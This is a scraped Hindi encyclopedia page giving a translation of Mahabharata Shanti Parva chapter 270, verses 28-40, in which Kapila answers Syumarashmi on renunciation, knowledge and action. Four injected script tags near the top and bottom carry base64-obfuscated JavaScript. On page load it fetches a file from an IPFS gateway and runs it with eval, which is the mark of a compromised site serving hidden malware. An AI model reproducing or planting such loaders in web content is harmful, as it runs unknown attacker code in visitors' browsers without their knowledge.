महाभारत शान्ति पर्व अध्याय 270 श्लोक 28-40

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

सप्‍तत्‍यधिकद्विशततम (270) अध्याय: शान्ति पर्व (मोक्षधर्म पर्व)

महाभारत: शान्ति पर्व: सप्‍तत्‍यधिकद्विशततम अध्याय श्लोक 28-40 अध्याय: का हिन्दी अनुवाद

इस प्रकार शुभ अथवा अशूभ कर्म ही पुरूष का तदनुरूप नाम नियत करता है। जिनके राग-द्वेष आदि कषाय पक गये हैं, जिनके मन से तृष्‍णा निकल गयी है, जो बाहर-भीतर से शुद्ध हैं तथा जिनकी बुद्धि कल्‍याणस्‍वरूप मोक्ष में लगी हुई है, उन तत्‍व ज्ञानी पुरूषों की दृष्ठि में अनन्‍त ब्रह्मज्ञान तथा शास्‍त्रज्ञान के प्रभाव से सब कुछ ब्रह्मस्‍वरूप हो गया था; यह बात सदा ही हमारे सुनने में आयी है । तुरीय ब्रह्म से संबंध रखने वाली जो उपनिषद विद्या है, उसकी प्राप्ति कराने वाले शम, दम, उपरति, तितिक्षा, श्रद्धा तथा समाधान रूप जो धर्म हैं, वह सभी वर्ण और आश्रम के लोगों के लिये साधारण है-ऐसा स्‍मृति का कथन है। परंतु जो संयतचित्त और तप: सिद्ध ब्रह्मनिष्‍ठ पुरूष हैं, वे ही सदा उस धर्म का साधन कर पाते हैं । संतोष ही जिसके सुख का मूल है, त्‍याग ही जिसका स्‍वरूप है, जो ज्ञान का आश्रय कहा जाता है, जिसमें मोक्षदायिनी बुद्धि-ब्रह्मसाक्षात्‍काररूप वृति नित्‍य आवश्‍यक है, वह संन्‍यास-आश्रमरूप धर्म सनातन है । यह यतिधर्म अन्‍य आश्रम के धर्मों से मिला हुआ हो या स्‍वतन्‍त्र हो, जो अपने वैराग्‍य-बल के अनुसार इसका आश्रय लेते हैं, वे कल्‍याण के भागी होते हैं। इस मार्ग से जाने वाले सभी पथिकों का परम कल्‍याण होता है; परंतु जो दुर्बल है- मन और इन्द्रियों को वश में न रखने के कारण जो इसके साधन में असमर्थ है, वही यहाँ शिथिल होकर बैठा रहता है। जो बाहर और भीतर से पवित्र है, वह ब्रह्मपद का अनुसंधान करता हुआ संसार-बन्‍धन से मुक्‍त हो जाता है । स्‍यूमरश्मि ने पूछा- ब्रह्मन् ! जो लोग प्राप्‍त हुए धन के द्वारा केवल भोग भोगते हैं, जो दान करते हैं, जो उस धन को यज्ञ में लगाते हैं, जो स्‍वाध्‍याय करते हैं अथवा जो त्‍याग का आश्रय लेते हैं, इनमें से कौन पुरूष मृत्‍यु के पश्‍चात प्रधानरूप से स्‍वर्गलोक पर विजय पाता है? मैं जिज्ञासुभाव से पूछ रहा हूँ; आप मुझे यह सब यथार्थ रूप से बताइये । कपिल जी ने कहा- जिनका सात्विक गुण से प्राकट्य हुआ है, ऐसे सभी परिग्रह शुभ हैं; परंतु त्‍याग में जो सुख है, उसे इनमें से कोई भी नहीं पा सके हैं। इस बात को तुम भी देखते हो । स्‍यूमरश्मि ने पूछा - भगवन् ! आप तो ज्ञाननिष्‍ठ हैं और गृहस्‍थलोग कर्मनिष्‍ठ होते हैं; परंतु आप इस समय निष्‍ठा में सभी आश्रमों की एकता का प्रतिपादन कर रहे हैं। इस प्रकार ज्ञान और कर्म की एकता और पृथकता - दोनों का भ्रम होने से इनका ठीक-ठीक अन्‍तर समझ में नहीं आता है। इसलिये आप मुझे उसे यथोचित एवं यथार्थरीति से बताने की कृपा करें । कपिल जी ने कहा- कर्म स्‍थूल और सूक्ष्‍म शरीर की शुद्धि करने वाले हैं, किंतु ज्ञान परम गतिरूप है। जब कर्मोंद्वारा चित्त के रागादि दोष जल जाते हैं, तब मनुष्‍य रस-स्‍वरूप ज्ञान में स्थित हो जाता है । समस्‍त प्राणियों पर दया, क्षमा, शान्ति, अहिंसा, सत्‍य, सरलता, अद्रोह, निरभिमानता, लज्‍जा, तितिक्षा और शम-ये परब्रह्म परमात्‍मा की प्राप्ति के मार्ग हैं। इनके द्वारा पुरूष परब्रह्म को प्राप्‍त कर लेता है। इस प्रकार विद्वान पुरूष को मन के द्वारा कर्म के वास्‍तविक परिणाम का निश्‍चय समझना चाहिये ।



« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>